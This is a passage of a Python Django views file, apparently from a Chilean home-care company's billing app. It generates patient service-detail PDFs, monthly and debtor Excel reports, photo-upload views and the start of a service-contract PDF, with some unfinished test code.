str(ano_hoy)+\"-\"+str(m_x).zfill(2)+\"-01\"\n\tfecha_fin = str(ano_hoy)+\"-\"+str(m_x).zfill(2)+\"-\"+str(totdias)\n\n\t## COMIENZA PRIMERA PAGINA\t\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\n\tc.setFont('Helvetica', 9)\n\n\tc.setLineWidth(.5)\n\t#c.setFillColorRGB(131,194,199) \n\n\tfila = 700\n\ttit = \"DETALLE DE PRESTACIONES\"\n\tc.drawString(225,fila+20,tit)\n\n\t# subrrayado\n\tc.line(225, fila+16, 225 + 128, fila+16) \n\n\t#sub-titulo\n\tc.drawString(35,fila-20,\"Paciente: \"+paciente.nombre+\" \"+paciente.rut+\", Período:\"+\n\t\t\" \"+mes_hoy+\" \"+str(ano_hoy))\n\n\t# fecha actual \n\tc.drawString(500,fila+50,\"Emisión: \"+str(fecha_actual())) # fecha_actual() en misfunciones.py\n\n\t# Prestación actual\n\tvaltot_y = request.session['neto_x'] \n\tvaltot_y = str(\"{:,}\".format(valtot_y))\n\tvaltot_y = str(valtot_y).rjust(14,' ')\n\tc.drawString(470,fila+15,\"Prest. Actual:\")\n\tc.drawString(536,fila+15,valtot_y)\n\n\t# Saldo anterior\n\tsaldoant_x = saldoant(rut_x,m_x,ano_hoy) # misfunciones.py\n\tsaldoant_x = str(\"{:,}\".format(saldoant_x))\n\tsaldoant_x = saldoant_x.strip()\n\t#saldoant_x = str(saldoant_x).rjust(14)\t\n\tc.drawString(470,fila+3,\"Saldo Anterior:\")\n\tc.drawString(536,fila+3,saldoant_x.rjust(14,' '))\n\n\t# Total abonos\n\ttot_abonos = anticipos(rut_x,fecha_ini,fecha_fin) # misfunciones.py\n\n\ttot_abonos = str(\"{:,}\".format(tot_abonos))\n\ttot_abonos = str(tot_abonos).rjust(14,' ')\n\tc.drawString(470,fila-8,\"Tot. Abonos:\")\n\tc.drawString(536,fila-8,tot_abonos)\n\n\t# Saldo a pago\n\tacum2 = str(\"{:,}\".format(acum2))\n\tacum2 = str(acum2).rjust(14,' ')\n\tc.drawString(470,fila-20,\"Saldo a pago: \")\n\tc.drawString(536,fila-20,acum2)\n\n\tfila = fila - 60\n\tcx = 35\n\tcy = fila - 68\n\n\t#headers=[\"#\",\"Dia\",\"Tur-1\",\"Tur-2\",\"Tur-3\",\"Val-1\",\"Val-2\",\"Val-3\",\"Val_tot\",\"Acum1\",\"Abon\",\"AcumT\"]\n\n\t# rectangulo de encabezado\n\tc.setFillColor(blue) # azul obcuro\n\tc.rect(cx,cy+78,550,20,fill=1) # rectangulo para las cabeceras de columnas\n\t\n\t# cabeceras de columna\n\tc.setFillColor(white) #choose your font colour\n\tc.drawString(cx+5,cy+85,\"# Dia Tur-1 Tur-2 Tur-3\"+\n\t\t\" Val-1 Val-2 Val-3 Val_tot Acum1\"+\n\t\t\" Abonos Acum Tot\")\n\n\tc.setFillColor(black)\n\tfor d in diarioaux:\n\t\tc.rect(cx,cy+60,550,17) # rectangulo en cada registro\n\t\tc.drawString(40,fila,str(d.ndia))\n\t\tc.drawString(60,fila,d.cdia)\n\t\tc.drawString(120,fila,str(d.turno1))\n\t\tc.drawString(160,fila,str(d.turno2))\n\t\tc.drawString(200,fila,str(d.turno3))\n\t\tc.drawString(240,fila,str(d.valor_t1))\t\t\n\t\tc.drawString(280,fila,str(d.valor_t2))\t\t\n\t\tc.drawString(320,fila,str(d.valor_t3))\t\t\n\t\tc.drawString(360,fila,str(d.val_tot))\n\t\tc.drawString(420,fila,str(d.acum1))\n\n\t\tuu = str(\"{:,}\".format(d.abonos))\n\t\tc.drawString(480,fila,str(uu).rjust(7))\n\n\t\trr = str(\"{:,}\".format(d.acum2))\n\t\tc.drawString(530,fila,rr.rjust(7))\n\n\t\t#c.drawString(530,fila,str(\"{:,}\".format(d.acum2)))\t\t\n\n\t\tfila = fila - 17\n\t\tcy = cy - 17\n\n\tc.showPage() #salto de pagina \n\tc.save() #Archivamos y cerramos el canvas\n\n\t# Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\t\n\t#desarrollo\n\t#return FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\ndef pdfdetalle2(request):\n\tfechahoy = datetime.now() \n\tancho, alto = letter\n\tnom_arch = \"detalle\"+nombrearch()+\".pdf\"\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\tc.setPageSize((ancho, alto))\n\t#\n\t# Borra archivos PDF's de la carpeta PDFS\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\n\tqry = Diario_aux.objects.all().order_by('ndia') \n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\n\t#c.setFont('Helvetica-Bold', 10)\n\tc.setFont('Helvetica', 9)\n\tfila = 700\n\tc.drawString(220,fila, \"DETALLE DE PRESTACIONES\")\n\n\tdatos=[]\n\n\tfor d in qry:\n\t\tdatos.append([d.ndia,d.cdia,d.turno1,d.turno2,d.turno3,\n\t\t\td.valor_t1,d.valor_t2,d.valor_t3,d.val_tot,d.acum1,d.abonos,d.acum2])\n\n\ttabulate(datos, headers=[\"#\",\"Dia\",\"Tur-1\",\"Tur-2\",\"Tur-3\",\"Val-1\",\"Val-2\",\"Val-3\",\"Val_tot\",\"Acum1\",\"Abon\",\"AcumT\"])\n\n\tc.showPage() #salto de pagina \n\tc.save() #Archivamos y cerramos el canvas\n\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n# CARTOLA DETALLE \n@login_required(login_url='login_ini')\ndef exceldetalle(request):\n\tnom_arch = nombrearch()\t# Se forma string para nombre de archivo excel\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tstring_nombre = 'deta'+nom_arch\n\n\tusername_y = request.session.get('username_x')\t# variable global \n\tqry = Diario_aux.objects.filter(username=username_y).order_by('fecha')\n\n\tif qry==None or qry==\"\":\n\t\treturn HttpResponse(\"No hay datos para el informe\")\n\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tfor fe in qry:\n\t\tpaciente_x = fe.paciente\t\n\t\trut_x = fe.rut\n\t\tfecha_x = fe.fecha\n\t\tcdia_x = fe.cdia\n\t\tndia_x = fe.ndia\n\t\tmes_hoy = fecha_x.month\n\t\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\t\tano_hoy = fecha_x.year\n\n\t# pauta solo de la fecha seleccionada\n\tfecha_ini = str(ano_hoy)+\"-\"+str(fecha_x.month).zfill(2)+\"-01 00:00:00\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\tfecha_fin = str(ano_hoy)+\"-\"+str(fecha_x.month).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5 # columna angosta chica inicial\n\tws.column_dimensions['B'].width = 5\t # numero del dia\n\tws.column_dimensions['C'].width = 10 # dia en palabras\n\n\tws.column_dimensions['D'].width = 14 # paciente\n\tws.column_dimensions['E'].width = 14 # turno dia \n\tws.column_dimensions['F'].width = 14 # turno tarde\n\n\tws.column_dimensions['G'].width = 10 # val.turno dia\n\tws.column_dimensions['H'].width = 14 # val.turno tarde\n\tws.column_dimensions['I'].width = 14 # val.turno noche\n\n\tws.column_dimensions['J'].width = 14 # Total valor jornada\n\tws.column_dimensions['K'].width = 14 # Acumulado\n\tws.column_dimensions['L'].width = 14 # Pagos\n\n\tws.column_dimensions['M'].width = 14 # Saldo acumulado\n\tws.column_dimensions['N'].width = 10 # Boleta\n\t\n\tr=13\t# posicion de la primera fila\n\n\t# Logo corporativo\n\timg = XLIMG(logo_corp)\n\tws.add_image(img, 'A1')\n\n\t#img = openpyxl.drawing.Image(logo_corp) \n\t#img.anchor(ws.cell('A1')) \n\t#ws.add_image(img) \n\n\t# POSICIONES: L3,L4,L5\n\tws.cell(row=r-10,column=12).value = \"Av. Quilín 3151, Macul\"\t\n\tws.cell(row=r-9,column=12).value = \"Fono: (+56) 22 408 85 91\"\t\n\tws.cell(row=r-8,column=12).value = \"contacto@asistenciaintegral.cl\"\t\n\tfor l in ['L3','L4','L5']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",size=14,bold=True)\n\n\tws.cell(row=r-2,column=2).value = \"Nombre:\"\n\tws.cell(row=r-2,column=4).value = paciente_x\n\tws.cell(row=r-1,column=2).value = \"RUT:\"\n\tws.cell(row=r-1,column=4).value = rut_x\n\n\tws.cell(row=r,column=2).value = \"Período:\"\n\tws.cell(row=r,column=4).value = mes_hoy+\"-\"+str(ano_hoy)\n\n\tfor l in ['B11','B12','B13','D11','D12','D13']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",size=14,bold=True)\n\n\tr=r+3\n\tws.cell(row=r-1,column=2).value = \"Nª\"\n\tws.cell(row=r-1,column=3).value = \"Dia\"\n\tws.cell(row=r-1,column=4).value = \"Turnos Mañana\"\n\tws.cell(row=r-1,column=5).value = \"Turnos Tarde\"\n\tws.cell(row=r-1,column=6).value = \"Turnos Noche\"\n\tws.cell(row=r-1,column=7).value = \"Valor dia\"\n\tws.cell(row=r-1,column=8).value = \"Valor tarde\"\n\tws.cell(row=r-1,column=9).value = \"Valor noche\"\n\tws.cell(row=r-1,column=10).value = \"Valor Tot\"\n\tws.cell(row=r-1,column=11).value = \"Acumulado\"\n\tws.cell(row=r-1,column=12).value = \"Pagos\"\n\tws.cell(row=r-1,column=13).value = \"Sald.Acum.\"\n\tws.cell(row=r-1,column=14).value = \"Boleta\"\n\n\tfor l in ['B15','C15','D15','E15','F15','G15','H15','I15','J15','K15','L15','M15','N15']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",bold=True)\n\n\tva1=0\t# Variables para acumular valores cuidador\n\tva2=0\n\ttot_turnos = 0 \n\tval_diario = 0\n\ttot_pagos = 0 # saldo anterior\n\t#abonosanti = anticipos(rut_x,fecha_ini,fecha_fin) # misfunciones\n\tk=0\n\tfor c in qry:\t# Diario_aux\n\t\tws.cell(row=r,column=2).value = c.ndia\t # numeral del dia\n\t\tws.cell(row=r,column=3).value = c.cdia \t # nombre del dia\n\t\tws.cell(row=r,column=4).value = c.turno1 \t\n\t\tws.cell(row=r,column=5).value = c.turno2 \n\t\tws.cell(row=r,column=6).value = c.turno3 \n\t\tws.cell(row=r,column=7).value = c.valor_t1 # valor dia\n\t\tws.cell(row=r,column=8).value = c.valor_t2\t\n\t\tws.cell(row=r,column=9).value = c.valor_t3\t\n\t\tws.cell(row=r,column=10).value = c.val_tot\t\n\t\tws.cell(row=r,column=11).value = c.acum1\n\t\tws.cell(row=r,column=12).value = c.abonos\n\t\tws.cell(row=r,column=13).value = c.acum2\n\t\tws.cell(row=r,column=14).value = c.boleta\n\t\t#\n\t\tif c.turno1 == None:\n\t\t\tc.turno1 = 0\n\t\tif c.turno2 == None:\n\t\t\tc.turno2 = 0\n\t\tif c.turno3 == None:\n\t\t\tc.turno3 = 0\n\t\tif c.val_tot == None:\n\t\t\tc.val_tot = 0\n\t\tif c.abonos == None:\n\t\t\tc.abonos = 0\n\n\t\ttot_turnos = tot_turnos + c.turno1 + c.turno2 + c.turno3 # sumas\n\t\tval_diario = val_diario + c.val_tot\n\t\ttot_pagos = tot_pagos + c.abonos\n\n\t\tr=r+1\n\t\tk=k+1\n\n\tws.cell(row=r,column=5).value = \"Sumas\"\n\tws.cell(row=r,column=6).value = tot_turnos\n\tws.cell(row=r,column=10).value = val_diario\n\n\t# Dibuja la grilla del informe\n\tthin_border = Border(\n \tleft=Side(border_style=BORDER_THIN, color='00000000'),\n \tright=Side(border_style=BORDER_THIN, color='00000000'),\n \ttop=Side(border_style=BORDER_THIN, color='00000000'),\n \tbottom=Side(border_style=BORDER_THIN, color='00000000')\n\t\t)\n\tcol = 2\n\tfil = 15\n\tfin_row = fil\n\twhile fil <= fin_row + c.ndia:\n\t\twhile col <= 14:\n\t\t\tws.cell(row=fil, column=col).border = thin_border\n\t\t\tcol = col + 1\n\t\tcol = 2\t\n\t\tfil = fil + 1\n\n\t# Colorea sumas\t\n\tfont_sumas = Font(name='Calibri',\n\t\t\tsize=11,\n bold=False,\n italic=False,\n vertAlign=None,\n underline='none',\n strike=False,\n color='FF000000')\n\t# Formateo de sumas\n\tcol = 2\n\twhile col <= 14:\n\t\t#a1.font = Font(color=\"01019C\",bold=True)\t\t\n\t\tws.cell(row=fil-1, column=col).font = font_sumas\n\t\tcol = col + 1\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n@login_required(login_url='login_ini')\ndef excelmensual(request):\n\tnom_arch = nombrearch()\t# Se forma string para nombre de archivo excel\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n \t#wb = load_workbook(os.getcwd() + \"\\\\\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\")\n\tstring_nombre = 'mens'+nom_arch\n\tqry = Mensual_aux.objects.all().order_by('paciente') \n\n\tif qry==None or qry==\"\":\n\t\treturn HttpResponse(\"No hay datos para el informe\")\n\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\t#paciente = Pacientes.objects.filter(estado=False).order_by('nombre') \n\n\tfor men in qry:\t# mensual_aux\n\t\tmes_hoy = men.mes\n\t\tano_hoy = men.ano\n\t\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5 # columna angosta chica inicial\n\t#\n\tws.column_dimensions['B'].width = 5\t # numero del dia\n\tws.column_dimensions['C'].width = 45 # paciente\n\tws.column_dimensions['D'].width = 14 # fono contacto\n\tws.column_dimensions['E'].width = 13 # total turnos \n\tws.column_dimensions['F'].width = 14 # total mensual\n\tws.column_dimensions['G'].width = 14 # saldo anterior\n\tws.column_dimensions['H'].width = 14 # abonos\n\tws.column_dimensions['I'].width = 14 # saldo pendiente\n\tws.column_dimensions['J'].width = 14 # Telefono movil\n\tws.column_dimensions['K'].width = 28 # Email\n\tws.column_dimensions['L'].width = 30 # ult Contacto\n\n\tr=13\t# posicion de la primera fila\n\tfin_row = r\n\t# Logo corporativo\n\timg = XLIMG(logo_corp) \n\tws.add_image(img, 'A1')\n\n\t#img = openpyxl.drawing.image.Image(logo_corp) \n\t#img.anchor(ws.cell('A1')) \n\t#ws.add_image(img,'A1') \n\n\t# POSICIONES: J3,J4,J5\n\tws.cell(row=r-10,column=11).value = \"Av. Quilín 3151, Macul\"\t\n\tws.cell(row=r-9,column=11).value = \"Fono: (+56) 22 408 85 91\"\t\n\tws.cell(row=r-8,column=11).value = \"contacto@asistenciaintegral.cl\"\t\n\tfor l in ['K3','K4','K5']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",size=14,bold=True)\n\n\tws.cell(row=r-4,column=6).value = \"RESUMEN PRESTACIONES \"+mes_hoy+\"-\"+str(ano_hoy)\n\ta1 = ws['F9']\n\ta1.font = Font(color=\"01019C\",size=14,bold=True)\t\n\n\tws.cell(row=r-2,column=2).value = \"Nª\"\n\tws.cell(row=r-2,column=3).value = \"Paciente\"\n\tws.cell(row=r-2,column=4).value = \"Contacto\"\n\tws.cell(row=r-2,column=5).value = \"Tot.turnos\"\n\tws.cell(row=r-2,column=6).value = \"Tot.mensual\"\n\tws.cell(row=r-2,column=7).value = \"Sald.Anterior\"\n\tws.cell(row=r-2,column=8).value = \"Abonos\"\n\tws.cell(row=r-2,column=9).value = \"Sald.pdte\"\n\tws.cell(row=r-2,column=10).value = \"Movil\"\n\tws.cell(row=r-2,column=11).value = \"Correo\"\n\tws.cell(row=r-2,column=12).value = \"Ult.Contacto\"\n\n\tfor l in ['B11','C11','D11','E11','F11','G11','H11','I11','J11','K11','L11']:\n\t\ta1 = ws[l]\n\t\ta1.font = Font(color=\"01019C\",bold=True)\n\n\tk=1\n\tfor reg in qry:\n\t\tws.cell(row=r-1,column=2).value = k\t\t\t\t# correlativo\n\t\tws.cell(row=r-1,column=3).value = reg.paciente # nombre cuidador\n\t\tws.cell(row=r-1,column=4).value = reg.con \t # contacto\n\t\tws.cell(row=r-1,column=5).value = reg.turnos # total turnos\n\t\tws.cell(row=r-1,column=6).value = reg.val_mes # total $ mes\n\t\tws.cell(row=r-1,column=7).value = reg.saldoant # saldo anterior\n\t\tws.cell(row=r-1,column=8).value = reg.abonos # abonos\n\t\tws.cell(row=r-1,column=9).value = reg.saldo # saldo final\n\t\tws.cell(row=r-1,column=10).value = reg.celular # movil\n\t\tws.cell(row=r-1,column=11).value = reg.correo # correo apoderado\n\t\tws.cell(row=r-1,column=12).value = reg.n_apod # nombre apod \n\t\tr=r+1\n\t\tk=k+1\n\n\tthin_border = Border(\n \tleft=Side(border_style=BORDER_THIN, color='00000000'),\n \tright=Side(border_style=BORDER_THIN, color='00000000'),\n \ttop=Side(border_style=BORDER_THIN, color='00000000'),\n \tbottom=Side(border_style=BORDER_THIN, color='00000000')\n\t\t)\n\n\tcol = 2\n\tfil = 11\n\twhile fil <= k + fin_row:\n\t\twhile col <= 12:\n\t\t\tws.cell(row=fil, column=col).border = thin_border\n\t\t\tcol = col + 1\n\t\tcol = 2\t\n\t\tfil = fil + 1\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n\ndef ponenombresaldos(request):\n\tvariable1 = 'Mantención de Parametros'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\terror_new = 'error2'\n\tsal_x = Saldos.objects.all()\n\tx=0\n\tfor s in sal_x:\t\n\t\trut_x = s.rut\n\t\tpctes = Pacientes.objects.filter(rut=rut_x)\t\n\t\tfor pc in pctes:\n\t\t\tnombre_x = pc.nombre\n\t\n\t\ts.nombre = nombre_x\n\t\tx=x+1\n\t\ts.save()\n\n\tcontext = {\n\t\t\"error_new\":error_new,\n\t\t\"variable1\":variable1,\n\t\t\"logo_corp\":logo,\n\t\t\"x\":x,\n\t\t}\t\n\treturn render(request,'menuparametros.html',context) \n\n\n#def subefotos(request):\n#\tvariable1 = 'Subiendo fotos de asistentes'\n#\t#form = Cuidadores.objects.get(id=1)\n#\tif request.method == \"POST\":\t\n#\t\t#ruta = 'misitio/ai/static/img/fotos' # donde subirá\n#\t\tform = UploadFileForm(request.POST, request.FILES)\n#\t\thandle_uploaded_file(request.FILES['file'])\n#\t\t\n#\t\t#ruta = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\fotos\\\\\"\n#\t\t#fichero = request.POST.get('ruta')\t\t\n#\t\t#return HttpResponse(newdoc)\n#\n#\t\t#shutil.copyfile(fichero, ruta)\n#\tcontext\t= {\"variable1\":variable1,}\n#\treturn render(request,'subefotos.html',context)\n\ndef subefotos2(request):\n\tvariable1 = 'Subiendo fotos de asistentes'\n\tf = UploadDocumentForm()\n\tif request.method == \"POST\":\t\n\t\t#UPLOADER_FOLDER = '/staticfiles/img/'\t # server\n\t\tUPLOADER_FOLDER = 'misitio/ai/static/img/' # local\n\t\tfotito = request.POST.get('fotito')\n\t\tf = request.FILES[fotito] \n\t\tfilename = secure.file_name(f.filename)\n\t\tf.save(os.path.join(app.config['UPLOADER_FOLDER'],filename))\n\tcontext\t= {\"variable1\":variable1,\"f\":f,}\n\treturn render(request,'subefotos.html',context)\n\n \ndef subefotos3(request):\n\tvariable1 = 'Subiendo fotos de asistentes'\n\tform = FormEntrada(request.POST, request.FILES)\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\ttitulo = request.POST['titulo']\n\t\t\ttexto = request.POST['texto']\n\t\t\tarchivo = request.FILES['archivo']\n\n\t\t\tinsert = Entrada(titulo=titulo, texto=texto, archiv=Archivo)\n\t\t\tinsert.save()\n\t\t\treturn render(request,'menuparametros.html',context)\n\t\telse:\n\t\t\tmessages.error(request, \"Error al procesar el formulario\")\n\telse:\n\t\tcontext\t= {\"variable1\":variable1,\"form\":form,}\n\t\treturn render(request,'subefotos.html',context)\n\ndef subefotos(request):\n\treturn HttpResponse(\"Este proceso se hace desde el modulo administrador..\")\n\tvariable1 = 'Subiendo fotos de asistentes '\n\tlogo_corp = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tform = UploadFileForm(request.POST, request.FILES or None)\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn render(request,'menuparametros.html',{\"variable1\":variable1,\"logo_corp\":logo_corp,})\t\n\treturn render(request,'subefotos.html', {\"variable1\":variable1,})\n\n\n@login_required(login_url='login_ini')\ndef altacondeuda(request):\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\t#logo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tvariable1 = \"Deudores a la fecha con o sin alta\"\n\tusername_y = request.session.get('username_x') # variable gurdada en view plantilla_base \n\n\t# borra el contenido de tabla mensual_aux, solo registros del usuario logeado\n\tcursor = connection.cursor() \n\tcursor.execute(\"delete from ai_mensual_aux where username = %s\",[username_y]) \n\n\tpaciente = Pacientes.objects.filter(estado=True).order_by('nombre') # solo marcados con estado \n\n\t# activa tabla Mensual_aux para pasarla en el context\n\tmensual_aux = Mensual_aux.objects.all()\n\n\t#cursor = connection.cursor() # es necesario: from django.db import connection\n\tcuenta = 0 \n\txcobrar_tot = 0\n\txcobrar_alta = 0\n\txcobrar_exis = 0\n\tfor pcte in paciente: \n\t\trut_x = pcte.rut\n\t\tpaciente_x = pcte.nombre\n\n\t\tfealta_x = '0000-00-00'\n\t\tif pcte.fe_alta != None:\n\t\t\tfealta_x = str(pcte.fe_alta)\n\t\t\tfealta_x = str(fealta_x[0:4])+\"-\"+str(fealta_x[5:7]).zfill(2)+\"-\"+str(fealta_x[8:10])\n\n\t\tcon_x = pcte.f_apod\t # fono contacto apoderado\n\t\tmes_x = int(fealta_x[5:7].zfill(2))\n\t\tano_x = int(fealta_x[0:4])\n\t\tsaldo_deudor = Saldos.objects.filter(rut=rut_x,mes=mes_x,ano=ano_x)\n\n\t\tsaldodeudor = 0\n\t\tfor sal in saldo_deudor:\n\t\t\tsaldodeudor = sal.saldo\n\t\t\txcobrar_tot = xcobrar_tot + saldodeudor # totalizador\n\n\t\tif \tsaldodeudor > 0:\n\t\t\tcursor.execute(\n\t\t\t\"insert into ai_mensual_aux (rut,paciente,con,celular,saldo,username,fe_alta)\"\n\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t,[rut_x,paciente_x,con_x,\n\t\t\tpcte.f_apod,saldodeudor,username_y,fealta_x])\n\n\t# calcula los deudores ALTAS y los EXISTENTES por separado\t\n\tfor tsaldos in mensual_aux:\n\t\tif tsaldos.fe_alta != None:\n\t\t\txcobrar_alta = xcobrar_alta + tsaldos.saldo\n\t\telse:\n\t\t\txcobrar_exis = xcobrar_exis + tsaldos.saldo\n\n\t\tcuenta = cuenta + 1\t\n\n\txcobrar = 0\n\tcontext ={\n\t\t\t\"variable1\":variable1,\n\t\t\t\"cuenta\":cuenta,\n\t\t\t\"mensual_aux\":mensual_aux,\n\t\t\t\"logo_corp\":logo,\n\t\t\t\"logo_excel\":logo_excel,\n\t\t\t\"logo\":logo,\n\t\t\t\"xcobrar_alta\":xcobrar_alta,\n\t\t\t\"xcobrar_exis\":xcobrar_exis,\n\t\t\t\"xcobrar_tot\":xcobrar_tot,}\n\treturn render(request,'grid_altacondeuda.html',context)\n\n\n## \tDE AQUI PARA ABAJO ES de prueba para borrar ###############\n\n\n@login_required(login_url='login_ini')\ndef repo1(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\n\tnom_arch = \"contrato\"+nombrearch()+\".pdf\"\n\t#logo_corp='/staticfiles/img/Logo_AsistenciaIntegral.jpg'\n\n\t# produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n \n # desarrollo\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\n\tc.setPageSize((ancho, alto))\n\t#\n\t#paciente = Pacientes_aux.objects.all() # inhibido el 19042020\n\trut_aux = request.session['rut_x']\t\t# 19042020\n\tpaciente = Pacientes.objects.get(rut=rut_aux) # 19042020\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\n\t# for ss in paciente: # 19042020 inhibido\n\t\t#rut_aux = ss.rut \t# 19042020 inhibido\n\t\t#rut_apod = ss.rut_apod #19042020 inhibido\n\n\trut_apod = paciente.rut_apod\t# nuevo 19042020\n\t#paciente = Pacientes.objects.get(rut=rut_aux) # 19042020 inhibido\n\n\tcomu = Param.objects.filter(tipo='COMU',codigo=paciente.comuna)\n\tfor com in comu:\n\t\tcomu_x = com.descrip\n\t\n\tbanco_x = \" \"\n\tvalor_abono = 0\n\tif paciente.fe_ini != None: # no de beria haber paciente sin fecha de inicio\n\t\tfe_i = str(paciente.fe_ini)[0:10] # entrega '9999-99-99'\tfecha de inicio del paciente\n\t\tfe_f = str(fechahoy)[0:10]\t\t # entrega '9999-99-99' \tfecha actual\n\t\texiste = Anticipos.objects.filter(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\n\t\tif existe==True:\n\t\t\tanticipo = Anticipos.objects.get(rut=paciente.rut,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\t# anticipo.abo: 1=efectivo, 2= cheque, 3=tarjeta,4=tranasferencia\n\t\t\tabono = Param.objects.filter(tipo='ABON',codigo=anticipo.abon)\n\t\t\tfor com in abono:\n\t\t\t\tabon_x = com.descrip\n\n\t\t\tvalor_abono = anticipo.valor\n\t\t\tcod_bco = anticipo.banco\n\t\t\tcheque_x = anticipo.cheque\n\t\t\tfe_che = str(anticipo.fecha)[0:10] # provisorio, se creará campo para este efecto en tabla ANTICIPO\n\n\tif existe==True: # anticipos sw_abono=1\n\t\tbanco = Param.objects.filter(tipo='BCO',codigo=cod_bco)\n\t\tfor bco in banco:\n\t\t\tbanco_x = bco.descrip\n\n\telse:\n\t\tbanco_x = \"\"\n\t\tcheque_x = \"\"\n\t\tfe_che = \"\"\n\t\tabon_x = \"\"\n\n ## COMIENZA PRIMERA PAGINA\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tc.drawString(160,690, \"CONTRATO DE PRESTACION DE SERVICIOS\")\n\tc.drawString(30,660, \"En Santiago de Chile a\")\n\tfe_x = fecha_palabra(paciente.fe_ini)\n\tc.drawString(155,660, fe_x)\n\n\tlen_x = len(fe_x) * 6\n\tc.drawString(155+len_x,660,\", se celebra el presente Contrato de Prestación de\")\n\tc.drawString(30,645,\"Servicios que suscribe por una parte\") # 15 del anterior\n\tlen_x = 36 * 5.5\n\tc.drawString(30+len_x,645,paciente.n_apod)\n\tc.drawString(30,630, \"R.U.T.:\")\n\tc.drawString(30 + 7 * 5.5,630,paciente.rut_apod)\n\tc.drawString(150,630,\"con domicilio en\")\n\tc.drawString(240,630,paciente.dir_apod)\n\t#c.drawString(30,615,\"comuna de \"+comu_x)\n\t#c.drawString(95,615,comu_x)\n\tc.drawString(30,615,\"comuna de \"+comu_x.strip()+\" Fono: \"+paciente.f_apod+\" correo \"+paciente.correo_apod+\" a quien se\")\n\tc.drawString(30,600,\"denominará más adelante como 'Cliente'; y de la otra parte Asistencia Integral Limitada\")\n\tc.drawString(30,585,\"R.U.T.: 76.191.893-1, representada por don 